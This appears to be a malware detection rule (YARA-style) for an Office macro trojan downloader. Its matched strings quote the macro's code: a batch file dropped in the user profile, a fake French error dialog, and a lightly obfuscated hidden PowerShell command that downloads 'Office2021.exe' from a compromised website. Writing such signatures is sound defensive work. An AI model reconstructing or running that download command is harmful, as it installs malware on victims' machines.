15 lines
1.7 KiB
Plaintext
15 lines
1.7 KiB
Plaintext
|
|
rule TrojanDownloader_O97M_EncDoc_SDS_MTB{
|
|
meta:
|
|
description = "TrojanDownloader:O97M/EncDoc.SDS!MTB,SIGNATURE_TYPE_MACROHSTR_EXT,05 00 05 00 05 00 00 "
|
|
|
|
strings :
|
|
$a_01_0 = {3d 20 45 6e 76 69 72 6f 6e 28 22 55 73 65 72 50 72 6f 66 69 6c 65 22 29 20 26 20 22 5c 67 6d 61 69 6c 2e 62 61 74 22 } //1 = Environ("UserProfile") & "\gmail.bat"
|
|
$a_01_1 = {3d 20 73 54 65 6d 70 20 26 20 73 42 75 66 20 26 20 76 62 43 72 4c 66 } //1 = sTemp & sBuf & vbCrLf
|
|
$a_01_2 = {3d 20 52 65 70 6c 61 63 65 28 22 38 37 70 38 37 6f 77 38 37 65 38 37 72 38 37 73 38 37 68 38 37 65 38 37 6c 38 37 6c 20 2d 77 38 37 69 38 37 6e 38 37 64 38 37 6f 77 38 37 73 38 37 74 38 37 79 38 37 6c 38 37 65 20 68 38 37 69 38 37 64 64 38 37 65 6e 20 38 37 49 38 37 6e 76 6f 38 37 6b 65 38 37 2d 57 38 37 65 62 52 38 37 65 38 37 71 75 38 37 65 38 37 73 38 37 74 20 68 38 37 74 38 37 74 38 37 70 73 3a 38 37 2f 2f 61 38 37 7a 67 38 37 65 6e 65 72 67 69 65 38 37 2e 66 38 37 72 2f 77 70 2d 63 38 37 6f 6e 38 37 74 65 6e 74 2f 75 70 38 37 6c 38 37 6f 38 37 61 64 73 38 37 2f 32 38 37 30 32 32 2f 30 32 2f 38 37 4f 66 66 69 63 65 32 30 32 31 2e 65 78 65 } //1 = Replace("87p87ow87e87r87s87h87e87l87l -w87i87n87d87ow87s87t87y87l87e h87i87dd87en 87I87nvo87ke87-W87ebR87e87qu87e87s87t h87t87t87ps:87//a87zg87energie87.f87r/wp-c87on87tent/up87l87o87ads87/287022/02/87Office2021.exe
|
|
$a_01_3 = {4d 73 67 42 6f 78 20 22 45 72 72 65 75 72 20 6c 6f 72 73 20 64 65 20 6c 27 6f 75 76 65 72 74 75 72 65 20 64 65 20 66 69 63 68 69 65 72 2e 2e 2e 22 } //1 MsgBox "Erreur lors de l'ouverture de fichier..."
|
|
$a_01_4 = {2e 4f 70 65 6e 20 28 4d 6f 6e 46 69 63 68 69 65 72 31 29 } //1 .Open (MonFichier1)
|
|
condition:
|
|
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1) >=5
|
|
|
|
} |